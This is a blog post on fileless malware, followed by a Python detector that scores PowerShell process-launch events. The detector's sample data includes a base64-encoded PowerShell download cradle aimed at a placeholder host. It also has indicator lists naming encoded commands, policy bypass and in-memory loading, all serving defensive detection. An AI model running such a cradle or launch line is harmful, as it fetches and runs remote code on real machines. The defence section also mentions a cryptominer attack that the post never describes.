December 11, 2023

In cybersecurity, defensive tools and training are pushing threat actors to adopt ever more sophisticated and evasive intrusion techniques as they attempt to gain a foothold in victim networks. Endpoint protection (EPP) services can easily identify traditional malware payloads as they are downloaded and saved on the endpoint, which means attackers have now turned to fileless techniques that never touch the victim's storage.

Understanding fileless malware

Fileless malware often starts with a file. While traditional malware contains the bulk of its malicious code within an executable file saved to the victim's storage drive, fileless malware's malicious actions reside solely in memory.

With traditional malware, deleting the executable means deleting the infection itself, which makes it easy for EPP solutions to identify and clean up quickly. Fileless malware, on the other hand, only uses the initial "dropper" file to open a built-in system management tool like PowerShell and run a short script. It then hides from defensive tools by injecting its malicious code into other processes, all the while never touching the victim's storage drive.

Fileless malware has become such a popular attack technique because it is exceedingly difficult to accurately identify and block the initial stages of these attacks without triggering false positives and preventing the same built-in tools from carrying out legitimate activities.

Examining the prime method

Fileless malware usually starts with some form of dropper file, although more evasive variants exist that truly don't require a file. These generally originate in one of two ways: either by exploiting a code execution vulnerability in an application, or by using stolen credentials to abuse a network-connected application's ability to run system commands.

Fending off fileless malware

The intrusion can be identified through a variety of methods, including evaluating its process behavior and recognizing the cryptominer. Since the threat actor never touched the victim's server storage drive throughout the course of the entire attack, endpoint defenses that only monitor files would have missed it entirely.

Moving forward, fileless malware usage will see steady growth as tools like PowerSploit make it easy to launch evasive attacks. To combat the threat, focus on deploying EPP and Endpoint Detection and Response (EDR) solutions capable of identifying indicators that exist solely in memory.
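The dropper-to-PowerShell chain described under "Understanding fileless malware" and the in-memory indicators an EDR should key on both come down to process telemetry rather than files on disk. The following is an added example, not code from this post or from any vendor: it scores constructed Sysmon-style process-creation events for the launch pattern the post describes (an Office or script-host parent spawning PowerShell with a hidden window, profile suppression and an encoded command), decodes the encoded command argument, and scans the decoded text for in-memory execution tokens. The parent list, indicator regexes, weights and the sample events are all assumptions made for illustration.

```python
"""Score process-creation events for fileless-style PowerShell launches.

Added example; the indicator lists and the sample events are constructed
for illustration and are not a vendor's rule set or real telemetry.
"""
import base64
import ntpath
import re

# Parents that rarely have a legitimate reason to spawn a shell directly (assumed list).
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
}
PARENT_WEIGHT = 3      # a suspicious parent alone reaches the alert threshold
ALERT_THRESHOLD = 3

# Command-line indicators of in-memory execution; each distinct hit adds one point.
INDICATORS = [
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"), "encoded command"),
    (re.compile(r"(?i)-(?:nop|noprofile)\b"), "profile suppressed"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "Invoke-Expression"),
    (re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest"), "download cradle"),
    (re.compile(r"(?i)frombase64string|\[reflection\.assembly\]::load"), "in-memory decode/load"),
]
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def _basename(path):
    return ntpath.basename(path).lower()


def analyze_event(event):
    """Score one event; only PowerShell images are scored, everything else gets 0."""
    reasons = []
    if _basename(event["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return {"ProcessId": event["ProcessId"], "score": 0, "reasons": reasons}
    score = 0
    parent = _basename(event["ParentImage"])
    if parent in SUSPICIOUS_PARENTS:
        score += PARENT_WEIGHT
        reasons.append("spawned by " + parent)
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    # Scan the raw command line, then the decoded payload (labelled "decoded: ...").
    for text, prefix in ((cmdline, ""), (decoded or "", "decoded: ")):
        for pattern, label in INDICATORS:
            if pattern.search(text) and prefix + label not in reasons:
                reasons.append(prefix + label)
                score += 1
    return {"ProcessId": event["ProcessId"], "score": score, "reasons": reasons}


def triage(events, threshold=ALERT_THRESHOLD):
    """Return the analyses that reach the alert threshold, highest score first."""
    hits = [analyze_event(e) for e in events]
    return sorted((h for h in hits if h["score"] >= threshold), key=lambda h: -h["score"])


# Constructed sample events (not real telemetry). The encoded payload is built here
# so the decoder can be exercised; example.invalid is a reserved, non-resolving name.
_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED_STAGE = base64.b64encode(_STAGE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"},
    {"ProcessId": 5088, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_STAGE},
    {"ProcessId": 912, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["ProcessId"], alert["score"], ", ".join(alert["reasons"]))
```

The scheduled backup script in the first event scores a single point (profile suppression) and stays below the threshold, while the Word-spawned launch scores on its parent, its flags and the decoded cradle, which is the point of weighting the parent-child relationship and the decoded content rather than any single token: a file-only scanner sees nothing in either case, because no payload is ever written to disk.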

It's critical that strong password policies are enforced and backed by multi-factor authentication wherever possible, to prevent credential theft from initiating an attack. Combined, these strategies can significantly reduce your risk of sustaining a breach due to fileless malware originating beyond the network.
